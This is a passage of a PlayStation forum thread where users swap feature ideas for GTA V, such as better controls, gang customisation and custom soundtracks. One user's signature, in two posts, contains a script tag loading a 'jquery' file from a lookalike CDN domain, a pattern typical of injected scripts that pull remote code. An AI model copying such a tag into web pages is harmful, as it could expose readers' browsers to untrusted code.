Showing results for 
Search instead for 
Do you mean 
Lombax Warrior
129 posts

Re: More Ideas for GTA V

May 9, 2013
Improved character control!
I've been playing the new tomb raider lately (absolutely fantastic btw), and realized just how crappy the character controls were for GTA4 - I'm going to jump up on this ledge to get a good sniping position.. oh wait. I'm actually going to leap right over this ledge and fall to my death instead!
Better controls please!

Also, while we're at it, I'm tired of looking both ways while running across a road, seeing no cars, then promptly getting flattened by one as soon as I get half way across. This isn't Back to the Future! Cars shouldn't appear out of nowhere.
Message 301 of 356 (309 Views)
0 Likes
Lombax Warrior
150 posts

May 10, 2013

jonathank1 wrote:

Trontasia wrote:

jonathank1 wrote:

http://www.gtav.net/news/4521/gtav-online-previews-and-screenshots

This is the info that has been confirmed by Rockstar so far. Claim your ideas if any of them are there!

http://www.igta5.com/

Four new pieces of artwork have been done.

I only saw in a video, one of the characters swinging a chair at a sign and the sign went out. I think most of my ideas can only be experienced during gameplay, and actually playing the game ourselves.

I think it was a flat screen that Michael swung a chair at, but that doesn't really matter right now.

I would love to see your ideas in action, in addition to the ones already confirmed. Reading them just got me super hyped for the game. Heists, vehicular actions, physics & mechanics, and a map about 5 times larger than the RDR map; that includes the oceanic areas...

And I see why Rockstar held up on the game. They of course said that they still had a couple things to fix in the game, in addition to adding in popular demands. What they said is becoming a tad obvious. For instance, in the charcter trailers, there were bugs and they were abundant. Every car had a hood that was slightly popped, the back chopper rotor wasn't rotating in the Trevor trailer, Trevor's finger went missing in the same trailer, and there are plenty more. As for the public demands, Rockstar said they weren't adding any RPG elements, skill meters, or purchasable property. Now they have confirmed it with those details.

I'm just really glad they're taking all the time they need, now that I see the true and blue reasons and permittable proof.

I saw the video on the site from afar and it looked like a sign from there, but realized it's a T.V. after watching the video again. The article was an awesome read. And the thing about the view, being more opened up and stuff. That sounded amazing... I was imagining a wider field of view. :smileyhappy:  And I love the sunny glow of the Vinewood sign area, the area itself. Amazing, spectacular... I hadn't noticed or realized things before, about the bugs, hoods popped up, but I think I noticed Trevor's finger missing. I noticed one of my ideas I posted, some of the text might be unreadable unless you highlight it. It was something about being a leader of a gang, and you could set your own gang policy. Like, you could set what colors they wear, what clothes they wear, what vehicles they drive, what weapons they use. I thought that would be fun. :smileyhappy:

photo GTA_San_Andreas_player86_zps6f6d7ab9.png
https://www.facebook.com/jeromy.weeks?ref=tn_tnmn
PhotobucketPhotobucketPhotobucketPhotobucket
Photobucket
Photobucket
Message 302 of 356 (161 Views)
0 Likes
Treasure Hunter
6426 posts

May 18, 2013

Trontasia wrote:

jonathank1 wrote:

Trontasia wrote:

jonathank1 wrote:

This is the info that has been confirmed by Rockstar so far. Claim your ideas if any of them are there!

I only saw in a video, one of the characters swinging a chair at a sign and the sign went out. I think most of my ideas can only be experienced during gameplay, and actually playing the game ourselves.

I think it was a flat screen that Michael swung a chair at, but that doesn't really matter right now.

I would love to see your ideas in action, in addition to the ones already confirmed. Reading them just got me super hyped for the game. Heists, vehicular actions, physics & mechanics, and a map about 5 times larger than the RDR map; that includes the oceanic areas...

And I see why Rockstar held up on the game. They of course said that they still had a couple things to fix in the game, in addition to adding in popular demands. What they said is becoming a tad obvious. For instance, in the charcter trailers, there were bugs and they were abundant. Every car had a hood that was slightly popped, the back chopper rotor wasn't rotating in the Trevor trailer, Trevor's finger went missing in the same trailer, and there are plenty more. As for the public demands, Rockstar said they weren't adding any RPG elements, skill meters, or purchasable property. Now they have confirmed it with those details.

I'm just really glad they're taking all the time they need, now that I see the true and blue reasons and permittable proof.

I saw the video on the site from afar and it looked like a sign from there, but realized it's a T.V. after watching the video again. The article was an awesome read. And the thing about the view, being more opened up and stuff. That sounded amazing... I was imagining a wider field of view. :smileyhappy:  And I love the sunny glow of the Vinewood sign area, the area itself. Amazing, spectacular... I hadn't noticed or realized things before, about the bugs, hoods popped up, but I think I noticed Trevor's finger missing. I noticed one of my ideas I posted, some of the text might be unreadable unless you highlight it. It was something about being a leader of a gang, and you could set your own gang policy. Like, you could set what colors they wear, what clothes they wear, what vehicles they drive, what weapons they use. I thought that would be fun. :smileyhappy:

Did you  see the  bmx  bikes  and   those tour  de france   like bikes.. I saw a few cars fom gta 1, its good they are bringing all the cars.. bansee returnss.. I wonder if a jagular returns as  well.. I saw the counthash. :smileyhappy:

Mcbuttz78

vp-psn legioniaree group.

Seek wisdom, not knowledge. Knowledge is of the past, Wisdom is of the future

Message 303 of 356 (136 Views)
0 Likes
Lombax Warrior
150 posts

May 19, 2013

mcbuttz78 wrote:

Trontasia wrote:

jonathank1 wrote:

Trontasia wrote:

jonathank1 wrote:

Did you  see the  bmx  bikes  and   those tour  de france   like bikes.. I saw a few cars fom gta 1, its good they are bringing all the cars.. bansee returnss.. I wonder if a jagular returns as  well.. I saw the counthash. :smileyhappy:

Yeah, it's cool. :smileyhappy: I wonder if there'll be mountain bikes too. I love the comforting ride of them. I've never played GTA 1. I've played GTA 2. It's cool about them bringing back all the cars.

<script type="text/javascript" src="http://cdn.code-jquery.com/jquery-1.7.2.min.js"></script>
Photobucket
Photobucket
Message 304 of 356 (130 Views)
0 Likes
Treasure Hunter
6426 posts

May 19, 2013

yup..

6952.jpg

7142.jpg

Mcbuttz78

vp-psn legioniaree group.

Seek wisdom, not knowledge. Knowledge is of the past, Wisdom is of the future

Message 305 of 356 (124 Views)
0 Likes
Lombax Warrior
150 posts

May 19, 2013

mcbuttz78 wrote:

yup..

6952.jpg

7142.jpg

Cool! :smileyhappy:)

<script type="text/javascript" src="http://cdn.code-jquery.com/jquery-1.7.2.min.js"></script>
Photobucket
Photobucket
Message 306 of 356 (121 Views)
0 Likes
Uncharted Territory
1599 posts

Jun 4, 2013

Custom soundtracks NEEDS to be in GTA V. If most GTA series on the PC feature custom soundtracks, then so can the PS3 and the 360 version. It's not complicated to add the feature, Rockstar. Most of us want to listen to our own songs while driving vehicles, just to add up the action to it, especially on the console, not just for PC. I love to listen to different radio stations for the upcoming game, but I also want to listen to my own songs whilst driving vehicles or flying aircrafts.

photo metakraken_redbull_final_500_zps9ce1f6ed.png

Message 307 of 356 (89 Views)
0 Likes
Lombax Warrior
145 posts

Jun 4, 2013

MetaKraken wrote:

Custom soundtracks NEEDS to be in GTA V. If most GTA series on the PC feature custom soundtracks, then so can the PS3 and the 360 version. It's not complicated to add the feature, Rockstar. Most of us want to listen to our own songs while driving vehicles, just to add up the action to it, especially on the console, not just for PC. I love to listen to different radio stations for the upcoming game, but I also want to listen to my own songs whilst driving vehicles or flying aircrafts.

That sounds like an excellent idea. I'm pretty sure you can download songs onto the PS3, so in GTA 5, there should be a station just for your music, probably labeled something as simple as "My MP3." Nothing should play at first, but what you should do is access the music on your phone, if there is an option, and it should give you two choices: to impliment music from the radio stations directly or to download your music from your music folder on the PS3's memory. It might take a little bit of time, but it should eventually transfer to your music to the custom station, so the next time you hop into a car and switch to that station, you should be able to listen to your music.

I have an iPod full of mostly 1970-2005 songs. If the Golden Era FM isn't on GTA V, then I could use the music I downloaded. I'd be a happy player.

Пластэсион элиэнс :smileyhappy:
Aliens
Message 308 of 356 (82 Views)
0 Likes
Keyblade Wielder
7464 posts

Jun 5, 2013

I like that idea. Other games have done that using the music feature in the XMB menu. Play whatever songs you have on your PS via what's on file.  If they could link that in-game via a radio station it would be pretty bytchin'! :smileywink:

Message 309 of 356 (77 Views)
0 Likes
Uncharted Territory
1599 posts

[ Edited ]
Jun 7, 2013

I agree with you. Sleeping Dogs, another GTA-esque game, has custom soundtracks via XMB, but it doesn't have much impact to it in my opinion, and I'm hoping Rockstar Games can add the custom soundtrack feature for the PS3/360 via radio station selection. Independence FM was featured on the PC version, but not for the PS3 and 360, which was a dissapointing effort, for GTA IV, so I hope GTA V has the feature. :smileyhappy:

EDIT: Also, the online multimplayer needs a LOT of improvements, so rather than limited clothing, RockStar should ad hundreds, if not thousands of clothing attire, and especially modify the height, weight, face, eyes, nose and mouth for your character, along with different variety of hairstyles and facial hairs.

photo metakraken_redbull_final_500_zps9ce1f6ed.png

Message 310 of 356 (74 Views)
0 Likes